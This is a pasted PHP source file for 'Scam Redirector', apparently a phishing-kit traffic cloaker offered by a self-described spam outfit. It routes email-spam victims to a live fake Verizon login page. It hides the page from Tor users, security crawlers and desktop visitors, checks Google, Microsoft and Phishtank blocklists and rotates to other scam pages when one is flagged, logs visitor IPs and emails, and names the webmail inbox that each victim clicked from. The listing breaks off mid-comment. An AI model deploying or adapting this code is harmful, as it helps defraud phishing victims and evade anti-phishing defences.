· 7 years ago · Nov 23, 2018, 03:08 PM
1<?php
2/*************************************************************************************
3** Scam Redirector v0.1 with IP banning system and more... **
4** Last Modified: July 20, 2009 **
5** Made by: SSS (Smart Spamming Solutions) from Romania **
6** --- Getting Spam To A Higher Level --- **
7** **
8** Contact: ssslocalhost[at]gmail.com **
9** <$$$>If you make $$$ with my script, please donate a few to me also :-)</$$$> **
10** **
11** Features: **
12** - Auto-change scam website if is offline or in Google's phish database **
13** - Advanced IP & Word (UA & Referrer) banning system, including Tor network **
14** - Logging system with anti-log poisoning through UA or Referrer **
15** - Sends an email when you are running out of scams **
16*************************************************************************************/
17//http://www.botsvsbrowsers.com/ip/166.137.133.178/index.html
18//https://wiki.mozilla.org/Phishing_Protection:_Server_Spec#Lookup_Requests
19//Do not show PHP errors
20error_reporting(0); //Leave as-is (recommended), otherwise put // in front of error_reporting(0);
21
22/*************
23** Settings **
24**************/
25//Scam Redirector version
26define("VERSION", "v0.1-July 20, 2009");
27
28//Log file, where the visitor data should be written
29define("LOG_FILE", "ip.html");
30
31//------------ TESTING or PRODUCTION
32define('STAGE', 'PRODUCTION');
33
34//Add Google Analytics, for advanced Spam Statistics :-)
35$google_analytics = 0; // 1 - True; 0 - False
36
37//Use the IP banning system
38$ip_ban = 1; // 1 - True; 0 - False
39
40//Ban Tor network IPs
41$ban_tor = 1; // 1 - True; 0 - False
42
43//Use the word banning system
44$word_ban = 1; // 1 - True; 0 - False
45
46$desktop_ban = 1;
47
48//Send email, if you are running out of scams
49$send_email = 1; // 1 - True; 0 - False
50
51//Where to send an email, if you are running out of scams ($send_email must be set to 1)
52define("EMAIL", "mainiuaidi@yahoo.com"); //Change this with your own email
53
54//Where to redirect the banned visitor
55define("REDIRECT_TO", "https://www.retailmenot.com/view/verizonwireless.com"); //Leave as-is (recommended)
56
57//Check the scam against Google's antiphish database (used in Firefox)
58//For better spam results set it to 1, but is not recommended since you will run out of scams in a matter of hours!
59define("GOOG_ANTIPHISH", 1); // 1 - True; 0 - False
60
61//Check the scam against Microsoft's antiphish database (used in Internet Explorer)
62//For better spam results set it to 1, but is not recommended since you will run out of scams in a matter of hours!
63$msft_antiphish = 1; // 1 - True; 0 - False
64
65
66 if (STAGE == 'TESTING')
67 {
68 //Define the path of the scam
69 define("PATH", "");
70
71 //Define scam pages
72 $scams = array('http://127.0.0.1/redirect/isonline.php', 'http://127.0.0.1/redirect/isonline2.php',
73 'http://127.0.0.1/redirect/isonline3.php', 'http://127.0.0.1/redirect/isonline4.php',
74 'http://127.0.0.1/redirect/isonline5.php');
75 } elseif (STAGE == 'PRODUCTION')
76 {
77 //Define the path of the scam
78 define("PATH", "index.php");
79
80 //Define scam pages
81 $scams = array('http://verizonwirelles.login.natura-medica.net/verizon/');
82 }
83
84define("FRH_TOTAL", count($scams));
85define("FRH_ONLINE", "Coming Soon");
86define("FRH_OFFLINE", "Coming Soon");
87
88$file = $_SERVER['PHP_SELF'];
89define("INDEX", $file);
90
91define("EMAILSFILE", "emails.txt");
92
93if ($_GET)
94{
95 SSSCommands();
96}
97
98InitStats();
99
100$detect_os = strtoupper($_SERVER["SERVER_SOFTWARE"]);
101$pos = strpos($detect_os, "WIN32");
102if ($pos === false) {
103 $current_os = "NON_WINDOWS";
104} else {
105 $current_os = "WINDOWS";
106}
107
108
109
110//Get the visitor IP
111if (@getenv(HTTP_CLIENT_IP))
112{
113 $ip = @getenv(HTTP_CLIENT_IP);
114} else
115{
116 $ip = @getenv(REMOTE_ADDR);
117}
118
119//Get hostname by IP
120$hostname = gethostbyaddr($ip);
121
122//Get date & time of the visit
123$dt = date("Y-m-d h:i:s A");
124
125//Get visitor's User Agent
126$agent = htmlspecialchars($_SERVER['HTTP_USER_AGENT']);
127
128
129
130
131
132
133//Get visitor's referrer
134if (isset($_SERVER['HTTP_REFERER']))
135{
136 $referrer = strtolower(htmlspecialchars($_SERVER['HTTP_REFERER']));
137} else
138 $referrer = "";
139
140//Function to get the webmail name
141function MailFromReferrer($referrer)
142{
143 //Define the patterns
144 $wp = array('mail.yahoo.', 'mail.live.com', 'webmail.aol.com', 'mail.aol.com',
145 '.earthlink.net', 'mail.lycos.com', 'mail.google.com', 'mail.excite.it',
146 '.libero.it', '.alice.it', 'mail.comcast.net', 'webmail.att.net', 'mail.rcn.',
147 '.mail.com', 'webmail.canada.com', '.verizon.net', 'commcenter.mchsi.com',
148 '.juno.com', 'newmail.core.com', 'webmail.peoplepc.com', '.netaddress.com',
149 '.bigpond.com', '.orange.co.uk', '.rr.com', '.roadrunner.com', 'www.me.com',
150 '.netzero.net', 'tiscali.co.uk', '.maktoob.com', '.netscape.com', '.rock.com',
151 '.operamail.com', 'www.google.com/ig/gmailmax', '.secureserver.net', '.coxmail.com', '.cox.net',
152 '.fuse.net', '.inbox.com', '.ntlworld.com', '.alltel.net', '.email.it',
153 '.nhlmail.com', '.alloymail.com', '.tiscali.it', '.dada.it', '.graffiti.net',
154 '.handbag.com', '.freenet.de', '.bluewin.ch', '.arcor.de', '.strato.de',
155 '.unitybox.de', '.eim.ae', 'mynet.com', 'oi.com.br', '.abv.bg', '.1und1.de', '.perfora.net',
156 '.abacho.de', '.yandex.ru', '.networld.at', '.rediffmail.com', '.mail.ru', 'mail.bg', '.edumail.at', '.verizonmail.com',
157 '.guam.net', '.northnet.org', '.easilymail.co.uk', '.knology.net', '.startlogic.com', '.katamail.com', '.tele2internet.it',
158 '.interfree.it', '.tim.it', '.jumpy.it', '.gmxattachments.net', '.fastwebnet.it', '.ilink.ro', '.zappmobile.ro', '.connex.ro',
159 '.freemail.hu', '.rediffmailpro.com', '.mayl.de', '.tre.it', '.cheapnet.it', '.ipower.com', '.aruba.it', '.gmx.net', '.tele2.it',
160 '.register.it', '.univision.com', '.charter.net', '.doteasy.com', '.utanet.at', '.alicebusiness.it', '.walla.co.il', '.fastmail.fm',
161 '.unofree.it', '.simail.it', '.netcentrum.cz', 'webmail.frontier.com');
162
163 //Define de webmail name
164 $wm = array('Yahoo! Mail', 'Hotmail', 'AOL', 'AOL', 'Earthlink', 'Lycos', 'Gmail',
165 'Excite IT', 'Libero IT', 'Alice IT', 'Comcast', 'AT&T', 'RCN', 'Mail', 'Canada',
166 'Verizon', 'Mediacom', 'Juno', 'CoreComm', 'PeoplePC', 'Net@ddress',
167 'BigPond', 'Orange', 'Road Runner', 'Road Runner', 'MobileMe', 'NetZero', 'Tiscali UK',
168 'Maktoob', 'Netscape', 'Rock.com', 'OperaMail', 'Gmail', 'secureserver.net', 'Cox', 'Cox',
169 'Fuse', 'Inbox.com', 'Virgin Media', 'Windstream', 'Email.it', 'Mail', 'Mail', 'Tiscali IT',
170 'Data.it', 'Graffiti.net', 'Handbag.com', 'freenet.de', 'bluewin.ch', 'Arcor', 'Strato.de',
171 'Unitymedia Mail', 'Etisalat', 'MYNET', 'Oi Brasil', 'Abv.bg', '1&1 Webmail', '1&1 Webmail',
172 'Abacho.de', 'Yandex', 'Networld Mail', 'Rediffmail', 'Mail.ru', 'Mail.bg', 'edumail.at', 'Verizon', 'Guam.net',
173 'Westelcom', 'EasilyMail', 'Knology', 'StartLogic', 'Katamail', 'TELE2 IT', 'Interfree', 'TIM', 'Mediaset.it',
174 'GMX', 'FASTWEB', 'iLink', 'Zapp Mobile', 'Connex', 'freemail.hu', 'Rediffmail Pro', 'MAYL.DE', 'Tre', 'Cheapnet',
175 'WEB.DE', 'IPOWER Webmail', 'Aruba Webmail', 'GMX', 'TELE2 IT', 'Register.it Webmail', 'Univision.com',
176 'Charter.net', 'Doteasy Webmail', 'TELE2 AT', 'Alice', 'Walla.co.il', 'FastMail', 'Uno Communications SpA', 'Simail.it', 'NetCentrum', 'Frontier');
177
178 //Define type
179 $wt = array('inbox', 'bulk', 'spam', 'junk', 'trash');
180
181 if (!empty($referrer))
182 {
183 for ($i = 0; $i <= count($wp) - 1; $i++)
184 {
185 $pos = strpos($referrer, $wp[$i]);
186 if ($pos === false)
187 {
188 //
189 } else
190 {
191 $pos1 = strpos($referrer, 'inbox');
192 if ($pos1 === false)
193 {
194
195 $pos2 = strpos($referrer, 'bulk');
196 if ($pos2 === false)
197 {
198 //
199
200 $pos3 = strpos($referrer, 'spam');
201 if ($pos3 === false)
202 {
203 $referrer = $wm[$i];
204 } else
205 {
206 $referrer = $wm[$i] . " - SPAM";
207 }
208
209 } else
210 {
211 $referrer = $wm[$i] . " - BULK";
212 }
213
214
215 } else
216 {
217 $referrer = $wm[$i] . " - INBOX";
218 }
219 }
220
221
222 }
223 }
224 return $referrer;
225}
226
227//Function to check if the IP is in our mask
228function compareRange($ip, $mask, $remaining)
229{
230 $ip = explode('.', $ip);
231 $mask = explode('.', $mask);
232 for ($i = 0; $i < sizeof($ip); $i++)
233 {
234 $m = $i < sizeof($mask) ? $mask[$i] : $remaining;
235 if ($ip[$i] < $m)
236 return - 1;
237 if ($ip[$i] > $m)
238 return 1;
239 }
240 return 0;
241}
242
243//Function to check if the IP is banned
244function checkIP($ip_to_match, $ip_array)
245{
246 if (is_array($ip_array))
247 {
248 foreach ($ip_array as $filter)
249 {
250 if (strpos($filter, '-') === false)
251 $limits = array($filter, $filter);
252 else
253 $limits = explode('-', $filter);
254 if (compareRange($ip_to_match, $limits[0], 0) >= 0 && compareRange($ip_to_match,
255 $limits[1], 255) <= 0)
256 return true;
257 }
258 }
259 return false;
260}
261
262//Function to check if the IP is banned
263function GetIPOwner($ip_to_match, $ip_array, $owner_array)
264{
265 if (is_array($ip_array))
266 {
267 $i = -1;
268 foreach ($ip_array as $filter)
269 {
270 $i++;
271 if (strpos($filter, '-') === false)
272 $limits = array($filter, $filter);
273 else
274 $limits = explode('-', $filter);
275 if (compareRange($ip_to_match, $limits[0], 0) >= 0 && compareRange($ip_to_match,
276 $limits[1], 255) <= 0){
277 if ($owner_array[$i] == '') return 'Not found'; else
278 return $owner_array[$i];
279 }
280 }
281 }
282 return 'Not found';
283}
284
285function counter()
286{
287 if (!file_exists('counter.txt'))
288 {
289 $fh = fopen('counter.txt', 'a');
290 fwrite($fh, "0\n");
291 fclose($fh);
292 }
293 $fh = fopen('counter.txt', 'r+');
294 $data = fread($fh, 512);
295 $count = $data + 1;
296 fseek($fh, 0);
297 fwrite($fh, $count . "\n");
298 fclose($fh);
299 return $count;
300}
301
302/**
303* Function get_between
304*
305* @param str IP Address
306* @return Boolean value representing whether or not the visitor should been banned
307*/
308function get_between($text, $s1, $s2) {
309 $mid_url = "";
310 $pos_s = strpos($text,$s1);
311 $pos_e = strpos($text,$s2);
312 for ( $i=$pos_s+strlen($s1) ; ( ( $i < ($pos_e)) && $i < strlen($text) ) ; $i++ ) {
313 $mid_url .= $text[$i];
314 }
315 return $mid_url;
316}
317
318/**
319* Function checkOnTheFlyBan check if the IP Address is in our On The Fly list with banned IPs
320*
321* @param str IP Address
322* @return Boolean value representing whether or not the visitor should been banned
323*/
324function checkOnTheFlyBan($ip)
325{
326 $url = "ip_ban.txt";
327 $lines = array_map('rtrim',file($url));
328 foreach ($lines as $line_num => $line)
329 {
330 if ($ip == $line)
331 {
332 return true;
333 }
334 }
335 return false;
336}
337
338function checkMobile(){
339 $useragent=$_SERVER['HTTP_USER_AGENT'];
340 if(preg_match('/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i',$useragent)||preg_match('/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i',substr($useragent,0,4))){
341 $mobile = true;
342 }else {
343 $mobile = false;
344 }
345 return $mobile;
346}
347
348//Function to check if the IP is a Tor node
349function checkTorNode($ip)
350{
351 //Tor nodes from https://www.dan.me.uk/torlist/
352 $url = "tor.txt"; // https://www.dan.me.uk/torlist/
353 $lines = array_map('rtrim',file($url));
354 foreach ($lines as $line_num => $line)
355 {
356 if ($ip == $line)
357 {
358 return true;
359 }
360 }
361 return false;
362}
363
364//Function to check if the word from referrer or UA is banned
365function checkWord($str, $bw)
366{
367 if (!empty($str))
368 {
369 $str = strtolower($str);
370 for ($i = 0; $i <= count($bw) - 1; $i++)
371 {
372 $pos = strpos($str, $bw[$i]);
373 if ($pos === false)
374 {
375 $bool = false;
376 } else
377 {
378 $bool = true;
379 break;
380 }
381 }
382 } else
383 {
384 $bool = false;
385 }
386 return $bool;
387}
388
389/**
390* Function SSSCommands is used to display internal pages of Scam Redirector
391*/
392function SSSCommands()
393{
394 define("TITLE", "[x0w] [R]edirector");
395 /**
396 * Function ShowMenu is used to display Scam Redirector's menu
397 */
398 function ShowMenu()
399 {
400 echo '<center>';
401 echo '<br /><br />[ <a href="'.LOG_FILE.'" target="_blank">View IP Log</a> ] | [ <a href="ip_ban.txt" target="_blank">View On-The-Fly IP List</a> ] | [ <a href="'.EMAILSFILE.'" target="_blank">View On-The-Fly Email List</a> ]';
402 echo "<br />[ <a href=".INDEX."?about>About</a> ] | [ <a href=".INDEX."?check>Check</a> ] | [ <a href=".INDEX."?empty>Empty</a> ] | [ <a href=".INDEX."?help>Help</a> ] | [ <a href=".INDEX."?info target=_blank>Info</a> ] | [ <a href=".INDEX."?settings>Settings</a> ] | [ <a href=".INDEX."?stats>Statistics</a> ] | [ <a href=".INDEX."?ver>Version</a> ] | [ <a href=".INDEX."?verify>Verify</a> ]";
403 echo '<br /><br />Copyright (c) 2014, <b>[S]</b>mart <b>[S]</b>pamming <b>[S]</b>olutions. All Rights Reserved.';
404 echo '</center>';
405 }
406
407 /**
408 * Function Percent is used to calculate the percentage based on two inputs
409 */
410 function Percent($num, $total, $p = false){
411 $per = round($num / $total * 100, 2);
412 if($p == true){
413 $per .= "%";
414 }
415 return $per;
416 }
417
418if (isset($_GET['about']))
419{
420 echo '<html><head><title>'.TITLE.' - About</title></head><body><center>';
421 echo "About <b>[S]</b>cam <b>[R]</b>edirector";
422 echo "<br /><br />";
423 echo "Version ".VERSION;
424 echo "<br /><br />";
425 echo "Made in Romania";
426 echo "<br /><br />";
427 echo "--- Getting Spam To A Higher Level ---";
428 echo "<br /><br />";
429 echo '</center>';
430 ShowMenu();
431 echo '</body></html>';
432}
433
434if (isset($_GET['check']))
435{
436 echo '<html><head><title>'.TITLE.' - Check</title></head><body><center>';
437
438$func = array("mail", "file_get_contents");
439
440for ($i=0;$i<count($func);$i++) {
441 if(!function_exists($func[$i])) {
442 echo "<font color=red>$func[$i] is not available. You cannot install <b>Scam Redirector</b> on this server.</font><br/>";
443 } else {
444 echo "<font color=green>$func[$i] is available. You can install <b>Scam Redirector</b> on this server.</font><br/>";
445 }
446}
447 echo '</center>';
448 ShowMenu();
449 echo '</body></html>';
450}
451
452//Piece of code used to clean-up the log file (Usage: index.php?empty)
453if (isset($_GET['empty']))
454{
455 echo '<html><head><title>'.TITLE.' - Empty</title></head><body><center>';
456 echo '<a href="'.INDEX.'?empty1">Clean '.LOG_FILE.'</a><br /><a href="'.INDEX.'?empty2">Clean '.LOG_FILE.' & reset counter & statistics</a>';
457 echo '</center>';
458 ShowMenu();
459 echo '</body></html>';
460}
461
462//Piece of code used to clean-up the log file (Usage: index.php?empty)
463if (isset($_GET['empty1']))
464{
465 //Reset counter
466 $fh = fopen(LOG_FILE, "w");
467 fwrite($fh, "");
468 fclose($fh);
469
470 echo '<html><head><title>'.TITLE.' - Empty</title></head><body><center>';
471 echo "The log file <b>".LOG_FILE."</b> has been cleaned.";
472 echo '</center>';
473 ShowMenu();
474 echo '</body></html>';
475}
476
477//Piece of code used to clean-up the log file (Usage: index.php?empty)
478if (isset($_GET['empty2']))
479{
480 //Reset counter
481 $fh = fopen(LOG_FILE, "w");
482 fwrite($fh, "");
483 fclose($fh);
484
485 echo '<html><head><title>'.TITLE.' - Empty</title></head><body><center>';
486 echo "The log file <b>".LOG_FILE."</b> has been cleaned.";
487
488 $fh = fopen('counter.txt', 'w');
489 fwrite($fh, "0\n");
490 fclose($fh);
491 $fh = fopen('stats.txt', 'w');
492 fwrite($fh, time().",0,0,0,0,0");
493 fclose($fh);
494 echo " The counter & statistics have been reset!";
495 echo '</center>';
496 ShowMenu();
497 echo '</body></html>';
498}
499
500if (isset($_GET['help']))
501{
502 echo '<html><head><title>'.TITLE.' - Help</title></head><body>';
503 echo "<b>[S]</b>cam <b>[R]</b>edirector Help";
504 echo "<br /><br />";
505 echo "<b>about</b> - Provides information about <b>[S]</b>cam <b>[R]</b>edirector";
506 echo "<br /><br />";
507 echo "<b>check</b> - Check if you can run <b>[S]</b>cam <b>[R]</b>edirector on this host.";
508 echo "<br /><br />";
509 echo "<b>empty</b> - Clears the log file.";
510 echo "<br /><br />";
511 echo "<b>help</b> - Provides Help information for <b>[S]</b>cam <b>[R]</b>edirector commands.";
512 echo "<br /><br />";
513 echo "<b>info</b> - Executes the phpinfo().";
514 echo "<br /><br />";
515 echo "<b>menu</b> - Displays the <b>[S]</b>cam <b>[R]</b>edirector menu.";
516 echo "<br /><br />";
517 echo "<b>stats</b> - Displays statistics about your spam and <b>[S]</b>cam <b>[R]</b>edirector.";
518 echo "<br /><br />";
519 echo "<b>ver</b> - Displays the <b>[S]</b>cam <b>[R]</b>edirector version.";
520 echo "<br /><br />";
521 echo "<b>verify</b> - Verify each scam and reports its status.";
522 echo "<br /><br />";
523 echo "Usage: <b>index.php?help</b>";
524 ShowMenu();
525 echo '</body></html>';
526}
527
528if (isset($_GET['info']))
529{
530 echo '<html><head><title>'.TITLE.' - Info (phpinfo)</title></head><body></body></html>';
531 phpinfo();
532}
533
534if (isset($_GET['menu']))
535{
536 echo '<html><head><title>'.TITLE.' - Menu</title></head><body>';
537 ShowMenu();
538 echo '</body></html>';
539}
540
541if (isset($_GET['settings']))
542{
543 echo '<html><head><title>'.TITLE.' - Settings</title></head><body>';
544 echo "<b>[S]</b>cam <b>[R]</b>edirector Settings";
545 echo "<br /><br />";
546 echo '<fieldset><legend>Settings</legend><table width="500" border="0">
547 <tr>
548 <td width="140"><b>Google Analytics</b></td>
549 <td width="10"> </td>
550 <td width="253">
551 <select name="ga">
552 <option value="Yes">Yes</option>
553 <option value="No" selected>No</option>
554 </select>
555 </td>
556 </tr>
557 <tr>
558 <td><b>Send Email</b></td>
559 <td> </td>
560 <td><select name="send_email">
561 <option value="Yes" selected>Yes</option>
562 <option value="No">No</option>
563 </select></td>
564 </tr>
565 <tr>
566 <td><b>Email</b></td>
567 <td> </td>
568 <td><input type="text" name="email" size="30" value="'.EMAIL.'" /></td>
569 </tr>
570 <tr>
571 <td><b>Redirect to</b></td>
572 <td> </td>
573 <td><input type="text" name="redirect_to" size="30" value="'.REDIRECT_TO.'" /></td>
574 </tr>
575 <tr>
576 <td><b>Stage</b></td>
577 <td> </td>
578 <td>
579 <select name="stage">';
580 if (STAGE == 'TESTING'){
581 echo '<option value="TESTING" selected>TESTING</option><option value="PRODUCTION">PRODUCTION</option>';
582 } elseif (STAGE == 'PRODUCTION'){
583 echo '<option value="TESTING">TESTING</option><option value="PRODUCTION" selected>PRODUCTION</option>';
584 }
585 echo '</select>
586 </td>
587 </tr>
588 <tr>
589 <td> </td>
590 <td> </td>
591 <td><input type="submit" name="submit" value="Save" /></td>
592 </tr>
593</table></fieldset>';
594 echo '<fieldset><legend>Logging</legend><table width="500" border="0">
595 <tr>
596 <td width="140"><b>Log File</b></td>
597 <td width="10"> </td>
598 <td width="253"><input type="text" name="log_file" value="'.LOG_FILE.'" /></td>
599 </tr>
600 <tr>
601 <td><b>Log normal IPs</b></td>
602 <td> </td>
603 <td><select name="log1">
604 <option value="Yes" selected>Yes</option>
605 <option value="No">No</option>
606 </select></td>
607 </tr>
608 <tr>
609 <td><b>Log banned IPs</b></td>
610 <td> </td>
611 <td><select name="log2">
612 <option value="Yes" selected>Yes</option>
613 <option value="No">No</option>
614 </select></td>
615 </tr>
616 <tr>
617 <td><b>Log watched IPs</b></td>
618 <td> </td>
619 <td><select name="log3">
620 <option value="Yes" selected>Yes</option>
621 <option value="No">No</option>
622 </select></td>
623 </tr>
624</table></fieldset>';
625 echo '<fieldset><legend>Banning</legend><table width="500" border="0">
626 <tr>
627 <td width="140"><b>IP Banning</b></td>
628 <td width="10"> </td>
629 <td width="253">
630 <select name="ban1">
631 <option value="Yes" selected>Yes</option>
632 <option value="No">No</option>
633 </select>
634 </td>
635 </tr>
636 <tr>
637 <td><b>Ban Tor Network</b></td>
638 <td> </td>
639 <td><select name="ban2">
640 <option value="Yes" selected>Yes</option>
641 <option value="No">No</option>
642 </select></td>
643 </tr>
644 <tr>
645 <td><b>Word Banning</b></td>
646 <td> </td>
647 <td><select name="ban2">
648 <option value="Yes" selected>Yes</option>
649 <option value="No">No</option>
650 </select></td>
651 </tr>
652</table></fieldset>';
653 echo '<fieldset><legend>Scams</legend><table width="500" border="0">
654 <tr>
655 <td width="140"><b>ScamPrint™</b></td>
656 <td width="10"> </td>
657 <td width="253"><input type="text" name="sp_1" size="40" value="<ISONLINE VALUE=TRUE></ISONLINE>" /></td>
658 </tr>
659 <tr>
660 <td><b>Google Antiphish</b></td>
661 <td> </td>
662 <td><select name="goog">
663 <option value="Yes" selected>Yes</option>
664 <option value="No">No</option>
665 </select></td>
666 </tr>
667 <tr>
668 <td><b>Microsoft Antiphish</b></td>
669 <td> </td>
670 <td><select name="msft">
671 <option value="Yes" selected>Yes</option>
672 <option value="No">No</option>
673 </select></td>
674 </tr>
675</table></fieldset>';
676 ShowMenu();
677 echo '</body></html>';
678}
679
680if (isset($_GET['stats']))
681{
682 $fh = fopen('stats.txt', 'r');
683 $data = fread($fh, 1024);
684 $array = explode(",", $data);
685 fclose($fh);
686
687 $otfip = 0;
688 $otfemails = 0;
689
690 if (file_exists('ip_ban.txt'))
691 {
692 $otfip = count(file('ip_ban.txt'));
693 }
694 if (file_exists(EMAILSFILE))
695 {
696 $otfemails = count(file(EMAILSFILE));
697 }
698
699 $vst = $array[1];
700 $unq = $array[2];
701 $bnd = $array[3];
702 $per1 = Percent($bnd, $vst, true);
703 $wat = $array[4];
704 if ($wat == '')
705 {
706 $wat = 0;
707 }
708 $per2 = Percent($wat, $vst, true);
709 $nor = $array[5];
710 $per3 = Percent($nor, $vst, true);
711 global $scams;
712 $FRH_CURRENT = ScamURL($scams);
713
714 $FRH_CURRENT_PARTS = parse_url($FRH_CURRENT);
715 $FRH_URL = $FRH_CURRENT_PARTS['scheme']."://".$FRH_CURRENT_PARTS['host'];
716 $frh_html = "";
717 for ($i = 0; $i <= count($scams) - 1; $i++)
718 {
719 $frh_html .= "#{".($i+1)."} $scams[$i]<br />";
720 }
721 $frh_html = str_replace($FRH_URL, "<font color=red>$FRH_URL</font>", $frh_html);
722 /*
723 $key = array_search($FRH_CURRENT, $scams);
724 $frh_online = FRH_TOTAL - $key;
725 */
726 echo '<html><head><title>'.TITLE.' - Statistics</title><meta http-equiv="refresh" content="10" /></head><body>';
727 echo "<b>[S]</b>cam <b>[R]</b>edirector Statistics";
728 echo "<br /><br />";
729 echo "Uptime: ".readable_time($array[0], 7);
730 echo "<br /><br />";
731 echo "Freehostia's: ".FRH_TOTAL."<br />".$frh_html."<br />Online: ".FRH_ONLINE."<br />Offline: ".FRH_OFFLINE;
732 echo "<br /><br />";
733 echo 'Visitors: <b><a href="'.LOG_FILE.'" target="_blank">'.$vst.'</a></b><br />Unique: <b>'.$unq.'</b><br />Banned: <b>'.$bnd.' ('.$per1.')</b><br />Watched: <b>'.$wat.' ('.$per2.')</b><br />Normal: <b>'.$nor.' ('.$per3.')</b>';
734 echo "<br /><br />";
735 echo 'On-The-Fly IPs: <b><a href="ip_ban.txt" target="_blank">'.$otfip.'</a></b><br />Emails: <b><a href="'.EMAILSFILE.'" target="_blank">'.$otfemails.'</a></b>';
736 echo "<br /><br />";
737 echo "Listed on Phishtank: <b>".GetPhishtank()."</b><br />Listed on Microsoft's phishing database: <b>No</b><br />Listed on Google's phishing database: <b>No</b>";
738 ShowMenu();
739 echo '</body></html>';
740}
741
742if (isset($_GET['ver']))
743{
744 echo '<html><head><title>'.TITLE.' - Version</title></head><body><center>';
745 echo "You are running <b>[S]</b>cam <b>[R]</b>edirector ".VERSION.".";
746 echo '</center>';
747 ShowMenu();
748 echo '</body></html>';
749}
750
751if (isset($_GET['verify']))
752{
753 echo '<html><head><title>'.TITLE.' - Verify</title></head><body><center>';
754 echo "Coming Soon";
755 echo '</center>';
756 ShowMenu();
757 echo '</body></html>';
758}
759
760die();
761}
762
763/**
764* Function checkAsRedirect check if the referrer is the same with Scam Redirector URL. If true, 90% of the vistors should be banned
765*
766* @param referrer Visitor's referrer
767* @return Boolean value representing whether or not the visitor should been banned
768*/
769function checkAsRedirect($referrer)
770{
771 //Check if server uses http or https
772 $protocol = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') ? 'https' : 'http';
773
774 /*
775 $_SERVER['SERVER_NAME'] does not work if UseCanonicalName is off. Used $_SERVER['HTTP_HOST'] instead
776 */
777 $url_1 = $protocol."://".$_SERVER['HTTP_HOST'].substr(INDEX, 0, strrpos(INDEX, '/'));
778 $url_2 = $protocol."://".$_SERVER['HTTP_HOST'].substr(INDEX, 0, strrpos(INDEX, '/'))."/";
779 if (($referrer == $url_1) || ($referrer == $url_2))
780 {
781 return true;
782 }
783 return false;
784}
785
786/**
787* Function RedirectURL check if the referrer is the same with Scam Redirector URL. If true, 90% of the vistors should be banned
788*
789* @param referrer Visitor's referrer
790* @return Boolean value representing whether or not the visitor should been banned
791*/
792function RedirectURL()
793{
794 //Check if server uses http or https
795 $protocol = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') ? 'https' : 'http';
796 $url = $protocol."://".$_SERVER['HTTP_HOST'].substr(INDEX, 0, strrpos(INDEX, '/'));
797 return $url;
798}
799
800/**
801* Function checkMatch check if the string matches our banned string
802*
803* @param str string
804* @param array Array with banned strings
805* @return Boolean value representing whether or not the visitor should been banned
806*/
807function checkMatch($str, $array)
808{
809 for ($i = 0; $i <= count($array) - 1; $i++)
810 {
811 if ($str == $array[$i])
812 {
813 return true;
814 break;
815 }
816 }
817 return false;
818}
819
820/**
821* Function checkUniqueIP
822*
823* @param ip IP Address
824*/
825function checkUniqueIP($ip)
826{
827 $lines = array_map('rtrim',file('ip.txt'));
828 foreach ($lines as $line_num => $line)
829 {
830 if ($ip == $line)
831 {
832 return true;
833 }
834 }
835 return false;
836}
837
838/**
839* Function CheckDuplicate verifies the specified file for duplicate strings
840*
841* @param str The string we want to check
842* @param file The file where we will check for duplicate
843* @return Boolean value representing whether or not the visitor should been banned
844*/
845function CheckDuplicate($str, $file) {
846 if (file_exists($file))
847 {
848 $handle = fopen($file, "r");
849 while(!@feof($handle))
850 {
851 $buffer .= @fgets($handle, 4096);
852 }
853
854 if (strstr($buffer,strtolower($str))) {
855 return true;
856 }
857 }
858 return false;
859}
860
861/**
